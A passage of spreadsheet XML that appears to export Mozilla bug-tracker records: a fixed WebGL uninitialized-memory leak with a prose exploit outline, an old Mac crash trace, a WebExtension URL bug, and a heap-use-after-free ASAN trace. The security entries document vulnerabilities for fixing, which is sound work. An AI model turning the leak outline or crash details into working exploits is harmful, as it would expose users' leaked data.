      <c r="I2255" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2255" t="inlineStr">
        <is>
          <t>Graphics: CanvasWebGL</t>
        </is>
      </c>
      <c r="K2255" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2255" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2255" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2255" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2255" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2255" t="inlineStr">
        <is>
          <t>[adv-main75+][adv-esr68.7+]</t>
        </is>
      </c>
      <c r="Q2255" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2255" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2255" t="inlineStr">
        <is>
          <t>mozilla76</t>
        </is>
      </c>
      <c r="T2255" t="n">
        <v>1</v>
      </c>
      <c r="U2255" t="n">
        <v>0</v>
      </c>
      <c r="V2255" t="n">
        <v>46</v>
      </c>
      <c r="W2255" t="inlineStr">
        <is>
          <t>This the security-bug version of bug 1624451. Unsure if we want to tip our hand and mark that one as a sec bug, since it started public.
webgl.copyTexSubImage supports reading from areas partially (or fully) outside the source resource. Since we would get undefined values (sec issue!) if we read out-of-bounds like this, we find the common subrect between the source resource size and the selected read rect. The WebGL spec defines out-of-bounds pixel reads as if they read zeros.
However, in this case, and with a destination texture image/slice which has never been initialized, and currently contains uninitialized contents[1], we neglect to initialize (oops) the contents of the image/slice before (safely) copying the valid source subrect onto it. This results in a careful copy into part of an otherwise-uninitialized resource, and the whole resource slice then is then marked incorrectly as initialized. (Subsequent reads from the resource will treat it as initialized, leaking the uninitialized contents)
The modern security model for GPU resource contents *should generally* restrict uninitialized data to within the process, not necessarily just from within the OpenGL context. Unfortunately for us, this means data could leak in from other GL contexts in the process. On Linux/Mac/Android, this should be only WebGL, and maybe Flash/Plugins, and we'll check if e.g. WebRender is affected.[2] Not all drivers we run WebGL on can be called "modern", so I have some concern that *leaked contents might be system-wide*, especially on older systems.
General exploit:
1. create a large uninitialized texture resource
2. copyTexSubImage from out-of-bounds of a source resource
3. read back the uninitialized/leaked contents
4. Exfil interesting leaked contents?
The hardest part here is (4), because:
* The possible sources of leaks are other GPU resources on the machine, probably (but not certainly) in-process only.
* It's hard to detect interesting contents to leak.
  * Maybe one could try to detect text, but you'll get an exfiltration dump mostly full of reddit.
* Trying to exfiltrate all data is not trivial, because it's all (large) images.
Due to the difficulty of an effective exfil path, I considered sec-medium, but sec-high seems safer because the core exploit up until exfil is easy, and exfil may be easy if you can afford to stream out a ton of images.
Non-minimal testcase: https://www.khronos.org/registry/webgl/sdk/tests/conformance/misc/uninitialized-test.html?webglVersion=1&amp;quiet=0&amp;quick=1
This has a high false-negative rate, so you may need to refresh a number of times before you see a (true-positive) failure. (in red)
[1]: Resource contents in WebGL are generally lazily initialized for performance reasons. On use, we lazily initialize the contents unless we can be sure the work would be redundant.
[2]: jrmuizel, do you know of any other GPU contexts in the client process?</t>
        </is>
      </c>
      <c r="X2255" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2256">
      <c r="A2256" t="n">
        <v>9288</v>
      </c>
      <c r="B2256" t="inlineStr">
        <is>
          <t>1999-07-05 20:51:55 -0700</t>
        </is>
      </c>
      <c r="C2256" t="inlineStr">
        <is>
          <t>[PP]Crashing when opening address book window</t>
        </is>
      </c>
      <c r="D2256" t="inlineStr">
        <is>
          <t>2018-08-29 15:22:03 -0700</t>
        </is>
      </c>
      <c r="E2256" t="n">
        <v>1</v>
      </c>
      <c r="F2256" t="n">
        <v>1</v>
      </c>
      <c r="G2256" t="n">
        <v>3</v>
      </c>
      <c r="H2256" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2256" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2256" t="inlineStr">
        <is>
          <t>Layout: Images, Video, and HTML Frames</t>
        </is>
      </c>
      <c r="K2256" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2256" t="inlineStr">
        <is>
          <t>PowerPC</t>
        </is>
      </c>
      <c r="M2256" t="inlineStr">
        <is>
          <t>Mac System 8.6</t>
        </is>
      </c>
      <c r="N2256" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2256" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2256" t="inlineStr"/>
      <c r="Q2256" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2256" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S2256" t="inlineStr">
        <is>
          <t>M8</t>
        </is>
      </c>
      <c r="T2256" t="n">
        <v>1</v>
      </c>
      <c r="U2256" t="n">
        <v>0</v>
      </c>
      <c r="V2256" t="n">
        <v>11</v>
      </c>
      <c r="W2256" t="inlineStr">
        <is>
          <t>Using multiple builds on July 5, the Mac crashes when opening mailnews window
either from browser task bar or from command line option -mail.
PowerPC unmapped memory exception at 1217FC10 nsHTMLFramesetFrame::Scale(int,
int, int*, int*
)+00148
 Calling chain using A6/R1 links
  Back chain  ISA  Caller
  00000000    PPC  0C8243C8
  0D3F7700    PPC  0C823150  main+00E8C
  0D3F7520    PPC  128C72B0  nsAppShellService::Run()+00020
  0D3F74E0    PPC  12526B98  nsAppShell::Run()+00050
  0D3F7460    PPC  125276A8  nsMacMessagePump::DoMessagePump()+00044
  0D3F7410    PPC  125279B0  nsMacMessagePump::DispatchEvent(int, EventRecord*)+
00188
  0D3F73C0    PPC  1276DCC0  Repeater::DoRepeaters(const EventRecord&amp;)+00034
  0D3F7380    PPC  1276D740  TimerPeriodical::RepeatAction(const EventRecord&amp;)+
00074
  0D3F7330    PPC  1276D1C4  TimerImpl::Fire()+00058
  0D3F72F0    PPC  1274E498  nsNetlibService::NetPollSocketsCallback(nsITimer*,
void*)+0004C
  0D3F72B0    PPC  12728B3C  NET_PollSockets+00034
  0D3F7260    PPC  12723A64  NET_ProcessNet+00518
  0D3F6EC0    PPC  127327C0  net_ProcessFile+000F4
  0D3F6E70    PPC  12731D54  net_read_file_chunk+00294
  0D3F6E20    PPC  12752D90  stub_put_block(_NET_StreamClass*, const char*,
long)+000D4
  0D3F6DD0    PPC  12308FCC  nsDocumentBindInfo::OnDataAvailable(nsIURI*,
nsIInputStream*, un
signed int)+000C0
  0D3F6D70    PPC  1247DE6C  nsParser::OnDataAvailable(nsIURI*, nsIInputStream*,
unsigned int
)+0024C
  0D3F6D00    PPC  1247D6E0  nsParser::ResumeParse(nsIDTD*)+000AC
  0D3F6CB0    PPC  1247D85C  nsParser::BuildModel()+0007C
  0D3F6C60    PPC  12468E94  CNavDTD::BuildModel(nsIParser*, nsITokenizer*,
nsITokenObserver*
, nsIContentSink*)+000A4
  0D3F6C00    PPC  124694FC  CNavDTD::HandleToken(CToken*, nsIParser*)+0027C
  0D3F6B90    PPC  1247B598  CTokenHandler::operator()(CToken*, nsIDTD*)+00048
  0D3F6B40    PPC  12468064  NavDispatchTokenHandler(CToken*, nsIDTD*)+00080
  0D3F6AF0    PPC  1246B64C  CNavDTD::HandleEndToken(CToken*)+001EC
  0D3F69F0    PPC  1246E0C4  CNavDTD::CloseContainersTo(nsHTMLTag, int)+00084
  0D3F6990    PPC  1246DF90  CNavDTD::CloseContainersTo(int, nsHTMLTag, int)+
000EC
  0D3F6810    PPC  1246DDE0  CNavDTD::CloseContainer(const nsIParserNode&amp;,
nsHTMLTag, int)+00
164
  0D3F67B0    PPC  1246D930  CNavDTD::CloseFrameset(const nsIParserNode&amp;)+0006C
  0D3F6770    PPC  11FC5878  HTMLContentSink::CloseFrameset(const nsIParserNode&amp;
)+0007C
  0D3F6720    PPC  11FC6100  HTMLContentSink::StartLayout()+00278
  0D3F6630    PPC  11FA08A8  PresShell::InitialReflow(int, int)+00428
  0D3F63F0    PPC  12215348  ViewportFrame::Reflow(nsIPresContext&amp;,
nsHTMLReflowMetrics&amp;, con
st nsHTMLReflowState&amp;, unsigned int&amp;)+00380
  0D3F6270    PPC  11F859D4  nsContainerFrame::ReflowChild(nsIFrame*,
nsIPresContext&amp;, nsHTML
ReflowMetrics&amp;, const nsHTMLReflowState&amp;, unsigned int&amp;)+000E4
  0D3F61D0    PPC  120551B4  RootFrame::Reflow(nsIPresContext&amp;,
nsHTMLReflowMetrics&amp;, const n
sHTMLReflowState&amp;, unsigned int&amp;)+003DC
  0D3F6010    PPC  11F859D4  nsContainerFrame::ReflowChild(nsIFrame*,
nsIPresContext&amp;, nsHTML
ReflowMetrics&amp;, const nsHTMLReflowState&amp;, unsigned int&amp;)+000E4
  0D3F5F70    PPC  11F78044  nsAreaFrame::Reflow(nsIPresContext&amp;,
nsHTMLReflowMetrics&amp;, const
 nsHTMLReflowState&amp;, unsigned int&amp;)+00114
  0D3F5EF0    PPC  1218CEE4  nsBlockFrame::Reflow(nsIPresContext&amp;,
nsHTMLReflowMetrics&amp;, cons
t nsHTMLReflowState&amp;, unsigned int&amp;)+00244
  0D3F5300    PPC  1218DFA8  nsBlockFrame::ReflowDirtyLines(nsBlockReflowState&amp;)+
0006C
  0D3F5280    PPC  1218E57C  nsBlockFrame::ReflowLine(nsBlockReflowState&amp;,
nsLineBox*, int*)+
00108
  0D3F5220    PPC  1218FE70  nsBlockFrame::ReflowInlineFrames(nsBlockReflowState&amp;
, nsLineBox*
, int*)+001C8
  0D3F5150    PPC  121901F0  nsBlockFrame::ReflowInlineFrame(nsBlockReflowState&amp;,
nsLineBox*,
 nsIFrame*, unsigned char*)+0004C
  0D3F50C0    PPC  12198878  nsLineLayout::ReflowFrame(nsIFrame*, nsIFrame**,
unsigned int&amp;)+
0045C
  0D3F4E80    PPC  12183064  nsHTMLFramesetFrame::Reflow(nsIPresContext&amp;,
nsHTMLReflowMetrics
&amp;, const nsHTMLReflowState&amp;, unsigned int&amp;)+00F14
  0D3F4CB0    PPC  121817D8  nsHTMLFramesetFrame::ReflowPlaceChild(nsIFrame*,
nsIPresContext&amp;
, const nsHTMLReflowState&amp;, nsPoint&amp;, nsSize&amp;, nsPoint*)+003C4
  0D3F4B50    PPC  11F859D4  nsContainerFrame::ReflowChild(nsIFrame*,
nsIPresContext&amp;, nsHTML
ReflowMetrics&amp;, const nsHTMLReflowState&amp;, unsigned int&amp;)+000E4
  0D3F4AB0    PPC  1218259C  nsHTMLFramesetFrame::Reflow(nsIPresContext&amp;,
nsHTMLReflowMetrics
&amp;, const nsHTMLReflowState&amp;, unsigned int&amp;)+0044C
 Return addresses on the stack
  Stack Addr  Frame Addr   ISA   Caller
   0D3F4B58                PPC   121817D8
nsHTMLFramesetFrame::ReflowPlaceChild(nsIFrame*, ns
IPresContext&amp;, const nsHTMLReflowState&amp;, nsPoint&amp;, nsSize&amp;, nsPoint*)+003C4
   0D3F4B18    0D3F4B10    PPC   11F946F8 nsFrame::SetRect(const nsRect&amp;)+0004C
   0D3F4B08    0D3F4B00    PPC   121A301C
nsHTMLReflowState::nsHTMLReflowState(nsIPresContext
&amp;, const nsHTMLReflowState&amp;, nsIFrame*, const nsSize&amp;)+00080
   0D3F4AE8    0D3F4AE0    PPC   11FB22FC NS_NewStyleContext(nsIStyleContext**,
nsIStyleConte
xt*, nsIAtom*, nsISupportsArray*, nsIPresContext*)+000E0
   0D3F4AC8    0D3F4AC0    PPC   121A3150 nsHTMLReflowState::Init(nsIPresContext&amp;
)+000A4
   0D3F4AB8    0D3F4AB0    PPC   11F859D4 nsContainerFrame::ReflowChild(nsIFrame*
, nsIPresCon
text&amp;, nsHTMLReflowMetrics&amp;, const nsHTMLReflowState&amp;, unsigned int&amp;)+000E4
   0D3F49E8    0D3F49E0    PPC   121A61B0
nsHTMLReflowState::ComputeMinMaxValues(int, int, co
nst nsHTMLReflowState*)+0011C
   0D3F48E8    0D3F48E0    PPC   1218259C
nsHTMLFramesetFrame::Reflow(nsIPresContext&amp;, nsHTML
ReflowMetrics&amp;, const nsHTMLReflowState&amp;, unsigned int&amp;)+0044C
   0D3F4838    0D3F4830    PPC   1218057C
nsHTMLFramesetFrame::GetBorderWidth(nsIPresContext*
)+00284
   0D3F4818    0D3F4810    PPC   1217FD08
nsHTMLFramesetFrame::CalculateRowCol(nsIPresContext
*, int, int, nsFramesetSpec*, int*)+00088</t>
        </is>
      </c>
      <c r="X2256" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2257">
      <c r="A2257" t="n">
        <v>1289273</v>
      </c>
      <c r="B2257" t="inlineStr">
        <is>
          <t>2016-07-25 20:32:21 -0700</t>
        </is>
      </c>
      <c r="C2257" t="inlineStr">
        <is>
          <t>windows.create schema doesn't specify "format": "relativeUrl"</t>
        </is>
      </c>
      <c r="D2257" t="inlineStr">
        <is>
          <t>2018-06-19 13:04:14 -0700</t>
        </is>
      </c>
      <c r="E2257" t="n">
        <v>1</v>
      </c>
      <c r="F2257" t="n">
        <v>1</v>
      </c>
      <c r="G2257" t="n">
        <v>3</v>
      </c>
      <c r="H2257" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2257" t="inlineStr">
        <is>
          <t>WebExtensions</t>
        </is>
      </c>
      <c r="J2257" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K2257" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2257" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2257" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2257" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2257" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2257" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main50+] triaged</t>
        </is>
      </c>
      <c r="Q2257" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R2257" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2257" t="inlineStr">
        <is>
          <t>mozilla52</t>
        </is>
      </c>
      <c r="T2257" t="n">
        <v>1</v>
      </c>
      <c r="U2257" t="n">
        <v>0</v>
      </c>
      <c r="V2257" t="n">
        <v>15</v>
      </c>
      <c r="W2257" t="inlineStr">
        <is>
          <t>Created attachment 8774583
window-create.zip
I've attached a WebExtension, that does this:
chrome.browserAction.onClicked.addListener((tab) =&gt; {
  chrome.windows.create({
    url: "popups/popup.html"
  });
});
"popups/popup.html" is a path to a file packaged with the add-on. In Chrome, the document is loaded. In Firefox, A new window opens, and tries to load "http://www.popups.com/popup.html".</t>
        </is>
      </c>
      <c r="X2257" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2258">
      <c r="A2258" t="n">
        <v>1347168</v>
      </c>
      <c r="B2258" t="inlineStr">
        <is>
          <t>2017-03-14 08:01:30 -0700</t>
        </is>
      </c>
      <c r="C2258" t="inlineStr">
        <is>
          <t>heap-use-after-free in nsSMILCompositor::GetFirstFuncToAffectSandwich</t>
        </is>
      </c>
      <c r="D2258" t="inlineStr">
        <is>
          <t>2024-05-30 09:30:34 -0700</t>
        </is>
      </c>
      <c r="E2258" t="n">
        <v>1</v>
      </c>
      <c r="F2258" t="n">
        <v>1</v>
      </c>
      <c r="G2258" t="n">
        <v>3</v>
      </c>
      <c r="H2258" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2258" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2258" t="inlineStr">
        <is>
          <t>SVG</t>
        </is>
      </c>
      <c r="K2258" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2258" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2258" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2258" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2258" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2258" t="inlineStr">
        <is>
          <t>[adv-main53+][adv-esr52.1+][adv-esr45.9+][post-critsmash-triage]</t>
        </is>
      </c>
      <c r="Q2258" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2258" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2258" t="inlineStr">
        <is>
          <t>mozilla55</t>
        </is>
      </c>
      <c r="T2258" t="n">
        <v>1</v>
      </c>
      <c r="U2258" t="n">
        <v>0</v>
      </c>
      <c r="V2258" t="n">
        <v>40</v>
      </c>
      <c r="W2258" t="inlineStr">
        <is>
          <t>The attached testcase (crash.html) crashes the latest ASAN build of Firefox (BuildID=20170313233726) as follows. The testcase requires the attached mini.svg.
=================================================================
==28440==ERROR: AddressSanitizer: heap-use-after-free on address 0x616000199dc8 at pc 0x7f8edf28b179 bp 0x7ffe8c450540 sp 0x7ffe8c450538
READ of size 8 at 0x616000199dc8 thread T0 (Web Content)
    #0 0x7f8edf28b178 in Equals /home/worker/workspace/build/src/dom/smil/nsSMILTargetIdentifier.h:75:38
    #1 0x7f8edf28b178 in UpdateCachedTarget /home/worker/workspace/build/src/dom/smil/nsSMILAnimationFunction.cpp:336
    #2 0x7f8edf28b178 in nsSMILCompositor::GetFirstFuncToAffectSandwich() /home/worker/workspace/build/src/dom/smil/nsSMILCompositor.cpp:168
    #3 0x7f8edf27f4cd in nsSMILCompositor::ComposeAttribute(bool&amp;) /home/worker/workspace/build/src/dom/smil/nsSMILCompositor.cpp:80:33
    #4 0x7f8edf27d57d in nsSMILAnimationController::DoSample(bool) /home/worker/workspace/build/src/dom/smil/nsSMILAnimationController.cpp:453:5
    #5 0x7f8edec24a21 in mozilla::dom::SVGAnimationElement::ActivateByHyperlink() /home/worker/workspace/build/src/dom/svg/SVGAnimationElement.cpp:404:7
    #6 0x7f8edfefd6a9 in mozilla::PresShell::GoToAnchor(nsAString_internal const&amp;, bool, unsigned int) /home/worker/workspace/build/src/layout/base/PresShell.cpp:3185:7
    #7 0x7f8ee24d1ac6 in nsDocShell::ScrollToAnchor(bool, bool, nsACString_internal&amp;, unsigned int) /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:11533:12
    #8 0x7f8ee246bc3c in nsDocShell::InternalLoad(nsIURI*, nsIURI*, bool, nsIURI*, unsigned int, nsIPrincipal*, nsIPrincipal*, unsigned int, nsAString_internal const&amp;, char const*, nsAString_internal const&amp;, nsIInputStream*, nsIInputStream*, unsigned int, nsISHEntry*, bool, nsAString_internal const&amp;, nsIDocShell*, nsIURI*, bool, nsIDocShell**, nsIRequest**) /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:10495:12
    #9 0x7f8ee24642fe in nsDocShell::LoadURI(nsIURI*, nsIDocShellLoadInfo*, unsigned int, bool) /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:1573:10
    #10 0x7f8edbe6caf5 in mozilla::dom::Location::SetURI(nsIURI*, bool) /home/worker/workspace/build/src/dom/base/Location.cpp:288:12
    #11 0x7f8edbe6d655 in mozilla::dom::Location::SetHash(nsAString_internal const&amp;) /home/worker/workspace/build/src/dom/base/Location.cpp:341:10
    #12 0x7f8edc5fdaf5 in SetHash /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/Location.h:209:14
    #13 0x7f8edc5fdaf5 in mozilla::dom::LocationBinding::set_hash(JSContext*, JS::Handle&lt;JSObject*&gt;, mozilla::dom::Location*, JSJitSetterCallArgs) /home/worker/workspace/build/src/obj-firefox/dom/bindings/LocationBinding.cpp:703
    #14 0x7f8edd9923e2 in mozilla::dom::GenericBindingSetter(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/dom/bindings/BindingUtils.cpp:2921:8
    #15 0x7f8ee345d67f in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:282:15
    #16 0x7f8ee345d67f in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:448
    #17 0x7f8ee345f3e4 in InternalCall /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:493:12
    #18 0x7f8ee345f3e4 in Call /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:512
    #19 0x7f8ee345f3e4 in js::CallSetter(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:641
    #20 0x7f8ee408aaea in js::SetPropertyIgnoringNamedGetter(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;jsid&gt;, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::PropertyDescriptor&gt;, JS::ObjectOpResult&amp;) /home/worker/workspace/build/src/js/src/proxy/BaseProxyHandler.cpp:245:10
    #21 0x7f8edd99dd79 in mozilla::dom::DOMProxyHandler::set(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;jsid&gt;, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, JS::ObjectOpResult&amp;) const /home/worker/workspace/build/src/dom/bindings/DOMJSProxyHandler.cpp:258:10
    #22 0x7f8ee40bb1f4 in js::Proxy::set(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;jsid&gt;, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, JS::ObjectOpResult&amp;) /home/worker/workspace/build/src/js/src/proxy/Proxy.cpp:369:12
    #23 0x7f8ee3fa53fa in JSObject::nonNativeSetProperty(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;jsid&gt;, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, JS::ObjectOpResult&amp;) /home/worker/workspace/build/src/js/src/jsobj.cpp:1049:12
    #24 0x7f8ee40dd25c in SetProperty /home/worker/workspace/build/src/js/src/vm/NativeObject.h:1458:16
    #25 0x7f8ee40dd25c in js::Wrapper::set(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;jsid&gt;, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, JS::ObjectOpResult&amp;) const /home/worker/workspace/build/src/js/src/proxy/Wrapper.cpp:152
    #26 0x7f8ee40922be in js::CrossCompartmentWrapper::set(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;jsid&gt;, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, JS::ObjectOpResult&amp;) const /home/worker/workspace/build/src/js/src/proxy/CrossCompartmentWrapper.cpp:238:5
    #27 0x7f8ee40bb1f4 in js::Proxy::set(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;jsid&gt;, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, JS::ObjectOpResult&amp;) /home/worker/workspace/build/src/js/src/proxy/Proxy.cpp:369:12
    #28 0x7f8ee3fa53fa in JSObject::nonNativeSetProperty(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;jsid&gt;, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, JS::ObjectOpResult&amp;) /home/worker/workspace/build/src/js/src/jsobj.cpp:1049:12
    #29 0x7f8ee343cdcf in SetProperty /home/worker/workspace/build/src/js/src/vm/NativeObject.h:1458:16
    #30 0x7f8ee343cdcf in SetPropertyOperation /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:243
    #31 0x7f8ee343cdcf in Interpret(JSContext*, js::RunState&amp;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:2747
    #32 0x7f8ee34297ab in js::RunScript(JSContext*, js::RunState&amp;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:394:12
    #33 0x7f8ee345d996 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:466:15
    #34 0x7f8ee345e072 in js::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::AnyInvokeArgs const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:512:10
    #35 0x7f8ee3e34d8c in JS::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, JS::HandleValueArray const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/jsapi.cpp:2887:12
    #36 0x7f8edd4117e2 in mozilla::dom::EventListener::HandleEvent(JSContext*, JS::Handle&lt;JS::Value&gt;, mozilla::dom::Event&amp;, mozilla::ErrorResult&amp;) /home/worker/workspace/build/src/obj-firefox/dom/bindings/EventListenerBinding.cpp:47:8
    #37 0x7f8eddd96a8e in HandleEvent&lt;mozilla::dom::EventTarget *&gt; /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/EventListenerBinding.h:65:12
    #38 0x7f8eddd96a8e in mozilla::EventListenerManager::HandleEventSubType(mozilla::EventListenerManager::Listener*, nsIDOMEvent*, mozilla::dom::EventTarget*) /home/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1119
    #39 0x7f8eddd98a58 in mozilla::EventListenerManager::HandleEventInternal(nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent**, mozilla::dom::EventTarget*, nsEventStatus*) /home/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1297:20
    #40 0x7f8eddd83133 in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray&lt;mozilla::EventTargetChainItem&gt;&amp;, mozilla::EventChainPostVisitor&amp;, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&amp;) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:465:5
    #41 0x7f8eddd869f7 in mozilla::EventDispatcher::Dispatch(nsISupports*, nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent*, nsEventStatus*, mozilla::EventDispatchingCallback*, nsTArray&lt;mozilla::dom::EventTarget*&gt;*) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:822:9
    #42 0x7f8edbcc09ce in nsGlobalWindow::PostHandleEvent(mozilla::EventChainPostVisitor&amp;) /home/worker/workspace/build/src/dom/base/nsGlobalWindow.cpp:3812:7
    #43 0x7f8eddd83245 in PostHandleEvent /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:416:3
    #44 0x7f8eddd83245 in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray&lt;mozilla::EventTargetChainItem&gt;&amp;, mozilla::EventChainPostVisitor&amp;, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&amp;) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:468
    #45 0x7f8eddd83854 in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray&lt;mozilla::EventTargetChainItem&gt;&amp;, mozilla::EventChainPostVisitor&amp;, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&amp;) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:518:5
    #46 0x7f8eddd869f7 in mozilla::EventDispatcher::Dispatch(nsISupports*, nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent*, nsEventStatus*, mozilla::EventDispatchingCallback*, nsTArray&lt;mozilla::dom::EventTarget*&gt;*) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:822:9
    #47 0x7f8edffe32a6 in nsDocumentViewer::LoadComplete(nsresult) /home/worker/workspace/build/src/layout/base/nsDocumentViewer.cpp:1043:7
    #48 0x7f8ee24bd63a in nsDocShell::EndPageLoad(nsIWebProgress*, nsIChannel*, nsresult) /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7642:5
    #49 0x7f8ee24b94e4 in nsDocShell::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, nsresult) /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7436:7
    #50 0x7f8ee24c0cff in non-virtual thunk to nsDocShell::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, nsresult) /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7333:13
    #51 0x7f8edafbcbc0 in nsDocLoader::DoFireOnStateChange(nsIWebProgress*, nsIRequest*, int&amp;, nsresult) /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:1258:3
    #52 0x7f8edafbbb58 in nsDocLoader::doStopDocumentLoad(nsIRequest*, nsresult) /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:842:5
    #53 0x7f8edafb88b6 in nsDocLoader::DocLoaderIsEmpty(bool) /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:732:9
    #54 0x7f8edafba9b4 in nsDocLoader::OnStopRequest(nsIRequest*, nsISupports*, nsresult) /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:614:5
    #55 0x7f8edafbb56c in non-virtual thunk to nsDocLoader::OnStopRequest(nsIRequest*, nsISupports*, nsresult) /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:470:14
    #56 0x7f8ed96dc25b in mozilla::net::nsLoadGroup::RemoveRequest(nsIRequest*, nsISupports*, nsresult) /home/worker/workspace/build/src/netwerk/base/nsLoadGroup.cpp:634:18
